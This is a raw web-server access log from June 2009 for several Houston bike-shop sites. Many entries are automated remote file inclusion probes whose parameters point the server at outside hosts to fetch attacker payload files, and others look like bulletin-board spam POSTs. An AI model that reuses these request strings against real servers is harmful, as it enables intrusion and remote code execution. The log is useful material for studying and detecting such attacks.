70.85.165.10 - - [09/Jun/2009:17:10:28 -0700] "GET ///?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:29 -0700] "GET /logs////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:32 -0700] "GET /logs/access.log%20%20////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:36 -0700] "GET ///?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:36 -0700] "GET /logs////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:36 -0700] "GET /logs/access.log%20%20////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:39 -0700] "GET ///?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:39 -0700] "GET /logs////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [09/Jun/2009:17:10:39 -0700] "GET /logs/access.log%20%20////?_zb_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.195.28 - - [09/Jun/2009:17:33:04 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {E4EE4F8C-8D5C-4ED3-84E5-7D3C6A570FF8}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; (R1 1.5))" "bicyclestoreshouston.com"
81.19.66.38 - - [09/Jun/2009:17:50:29 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:17:50:29 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:17:50:33 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:17:50:37 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:18:21:51 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
202.6.141.212 - - [09/Jun/2009:18:28:17 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:28:17 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:28:17 -0700] "GET /translations/English-US.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:28:26 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:28:26 -0700] "GET /translations/English-US.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:28:26 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.187.42 - - [09/Jun/2009:18:28:34 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.187.42 - - [09/Jun/2009:18:28:34 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.187.42 - - [09/Jun/2009:18:28:35 -0700] "GET /translations/Finnish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.187.42 - - [09/Jun/2009:18:28:38 -0700] "GET /translations/English-US.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.187.42 - - [09/Jun/2009:18:29:01 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.187.42 - - [09/Jun/2009:18:29:01 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.187.42 - - [09/Jun/2009:18:29:03 -0700] "GET /translations/English-US.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:31:00 -0700] "GET /translations/Finnish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:31:01 -0700] "GET /translations/Finnish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.142.250 - - [09/Jun/2009:18:32:01 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
72.44.187.42 - - [09/Jun/2009:18:33:08 -0700] "GET /translations/Finnish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:18:35:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
202.6.141.212 - - [09/Jun/2009:18:39:29 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
202.6.141.212 - - [09/Jun/2009:18:39:29 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
202.6.141.212 - - [09/Jun/2009:18:39:29 -0700] "GET /translations/Portuguese_BR.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.150.170 - - [09/Jun/2009:18:44:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
72.94.249.34 - - [09/Jun/2009:18:46:10 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.houstonbikeshop.com"
202.6.141.212 - - [09/Jun/2009:18:49:22 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.6.141.212 - - [09/Jun/2009:18:49:22 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.6.141.212 - - [09/Jun/2009:18:49:22 -0700] "GET /translations/Spanish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.44.187.42 - - [09/Jun/2009:18:53:26 -0700] "GET /translations/Spanish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.44.187.42 - - [09/Jun/2009:18:53:26 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.44.187.42 - - [09/Jun/2009:18:53:29 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
38.99.44.105 - - [09/Jun/2009:18:57:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:19:00:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [09/Jun/2009:19:01:17 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
218.249.36.194 - - [09/Jun/2009:19:03:34 -0700] "GET /logs/access.log%20%20//stats//?path%5Bdocroot%5D=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [09/Jun/2009:19:03:37 -0700] "GET /stats//?path%5Bdocroot%5D=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.249.36.194 - - [09/Jun/2009:19:03:37 -0700] "GET /logs//stats//?path%5Bdocroot%5D=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:19:20:10 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
216.129.119.14 - - [09/Jun/2009:19:20:31 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jun/2009:19:20:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
218.249.36.194 - - [09/Jun/2009:19:27:12 -0700] "GET /logs/access.log//stats//?path%5Bdocroot%5D=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:19:30:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:19:30:31 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:19:35:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
211.189.18.73 - - [09/Jun/2009:19:43:19 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:19:43:19 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:19:43:27 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:19:43:29 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:19:44:54 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:19:44:54 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:19:44:54 -0700] "GET /translations/Czech.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:19:45:14 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:19:45:14 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:19:45:14 -0700] "GET /translations/Czech.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:19:45:26 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:19:45:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:19:45:26 -0700] "GET /translations/Turkish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:19:45:40 -0700] "GET /translations/Turkish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jun/2009:19:48:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [09/Jun/2009:19:57:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
211.189.18.73 - - [09/Jun/2009:20:04:23 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:04:23 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:04:23 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:05:36 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:05:36 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:05:36 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:12:26 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:12:36 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:17:18 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [09/Jun/2009:20:17:21 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:18:48 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:18:48 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:18:49 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:19:36 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
74.52.2.130 - - [09/Jun/2009:20:22:23 -0700] "GET /translations/Dutch.txt/include/html/config.php?DIR=http://ingrus.net/sox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
74.52.2.130 - - [09/Jun/2009:20:22:24 -0700] "GET /include/html/config.php?DIR=http://ingrus.net/sox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
74.52.2.130 - - [09/Jun/2009:20:22:24 -0700] "GET /translations/include/html/config.php?DIR=http://ingrus.net/sox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
72.36.134.234 - - [09/Jun/2009:20:24:18 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [09/Jun/2009:20:24:18 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [09/Jun/2009:20:24:18 -0700] "GET /appserv/main.php?appserv_root=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:28:15 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:28:16 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:28:17 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:28:27 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:35:37 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:35:38 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:35:39 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:38:07 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
72.44.187.42 - - [09/Jun/2009:20:44:00 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
72.44.187.42 - - [09/Jun/2009:20:44:00 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
72.44.187.42 - - [09/Jun/2009:20:44:03 -0700] "GET /translations/Portuguese_BR.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
72.44.187.42 - - [09/Jun/2009:20:46:59 -0700] "GET /translations/Spanish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.44.187.42 - - [09/Jun/2009:20:46:59 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.44.187.42 - - [09/Jun/2009:20:47:00 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
122.153.212.195 - - [09/Jun/2009:20:47:47 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:47:48 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:47:48 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
122.153.212.195 - - [09/Jun/2009:20:47:49 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.collegedalfred.ca/upload/documents/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:20:54:03 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:20:54:04 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:20:54:05 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
89.113.78.135 - - [09/Jun/2009:21:04:45 -0700] "GET /bullitinboard/viewtopic.php?p=11114&sid=e2636c9e9c6e7c5ad403d89f15443edc HTTP/1.0" 200 438 "http://www.svbikes.com/bullitinboard//viewtopic.php?p=11114&sid=e2636c9e9c6e7c5ad403d89f15443edc" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.svbikes.com"
89.113.78.135 - - [09/Jun/2009:21:04:45 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.svbikes.com"
89.113.78.135 - - [09/Jun/2009:21:04:46 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.svbikes.com"
202.6.141.212 - - [09/Jun/2009:21:19:12 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
202.6.141.212 - - [09/Jun/2009:21:19:12 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
202.6.141.212 - - [09/Jun/2009:21:19:12 -0700] "GET /translations/Portuguese_BR.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.150.170 - - [09/Jun/2009:21:23:38 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
